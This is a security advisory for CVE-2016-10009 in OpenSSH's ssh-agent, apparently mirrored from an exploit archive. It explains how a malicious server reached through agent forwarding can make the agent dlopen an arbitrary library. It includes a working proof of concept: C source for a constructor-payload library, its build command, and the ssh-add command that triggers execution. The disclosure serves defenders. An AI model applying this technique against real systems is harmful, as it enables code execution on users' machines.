OpenSSH 7.4 - agent Protocol Arbitrary Library Loading Vulnerability

🗓️ 23 Dec 2016 00:00:00Reported by Jann HornType

zdt🔗 0day.today👁 6688 Views

OpenSSH agent PKCS11 provider loading vulnerabilit

Reporter	Title	Published	Views	Family All 245
IBM Security Bulletins	Security Bulletin: IBM Security Network Protection is affected by vulnerabilities in OpenSSH (CVE-2016-6210 CVE-2016-6515 CVE-2016-10009 CVE-2016-10011)	16 Jun 201822:03	–	ibm
IBM Security Bulletins	IBM Security Network Protection / IBM QRadar Network Security / XGS Technote Index	31 Jan 202100:10	–	ibm
IBM Security Bulletins	Security Bulletin: Multiple vulnerabilities in openssh affect IBM Flex System Manager (FSM)	18 Jun 201801:39	–	ibm
IBM Security Bulletins	Security Bulletin: Vulnerabilities in OpenSSH affects Power Hardware Management Console	23 Sep 202101:45	–	ibm
IBM Security Bulletins	Security Bulletin: Multiple security vulnerabilities have been fixed in products bundled with IBM Security Directory Suite 8.0.1	16 Jun 201822:04	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Security Access Manager Appliance is affected by OpenSSH vulnerabilities	16 Jun 201822:04	–	ibm
IBM Security Bulletins	Security Bulletin: Vulnerabilities in OpenSSH affect PowerKVM	18 Jun 201801:38	–	ibm
IBM Security Bulletins	Security Bulletin: IBM MQ Appliance is affected by OpenSSH vulnerabilities	13 Aug 201919:08	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Security Access Manager Appliance is affected by OpenSSH vulnerabilities	16 Jun 201822:05	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Security Privileged Identity Manager is affected by multiple vulnerabilities	19 Sep 201900:39	–	ibm

OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading

OpenSSH: agent protocol permits loading arbitrary libraries 

CVE-2016-10009


The OpenSSH agent permits its clients to load PKCS11 providers using the commands SSH_AGENTC_ADD_SMARTCARD_KEY and SSH_AGENTC_ADD_SMARTCARD_KEY_CONSTRAINED if OpenSSH was compiled with the ENABLE_PKCS11 flag (normally enabled) and the agent isn't locked. For these commands, the client has to specify a provider name. The agent passes this provider name to a subprocess (via ssh-agent.c:process_add_smartcard_key -> ssh-pkcs11-client.c:pkcs11_add_provider -> ssh-pkcs11-client.c:send_msg), and the subprocess receives it and passes it to dlopen() (via ssh-pkcs11-helper.c:process -> ssh-pkcs11-helper.c:process_add -> ssh-pkcs11.c:pkcs11_add_provider -> dlopen). No checks are performed on the provider name, apart from testing whether that provider is already loaded.

This means that, if a user connects to a malicious SSH server with agent forwarding enabled and the malicious server has the ability to place a file with attacker-controlled contents in the victim's filesystem, the SSH server can execute code on the user's machine.

To reproduce the issue, first create a library that executes some command when it is loaded:

$ cat evil_lib.c
#include <stdlib.h>
__attribute__((constructor)) static void run(void) {
  // in case you're loading this via LD_PRELOAD or LD_LIBRARY_PATH,
  // prevent recursion through system()
  unsetenv("LD_PRELOAD");
  unsetenv("LD_LIBRARY_PATH");
  system("id > /tmp/test");
}
$ gcc -shared -o evil_lib.so evil_lib.c -fPIC -Wall

Connect to another machine using "ssh -A". Then, on the remote machine:

$ ssh-add -s [...]/evil_lib.so
Enter passphrase for PKCS#11: [just press enter here]
SSH_AGENT_FAILURE
Could not add card: [...]/evil_lib.so

At this point, the command "id > /tmp/test" has been executed on the machine running the ssh agent:

$ cat /tmp/test
uid=1000(user) gid=1000(user) groups=[...]

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.



Found by: Jann Horn

#  0day.today [2018-04-04]  #

23 Dec 2016 00:00Current

7.9High risk

Vulners AI Score7.9

EPSS0.37431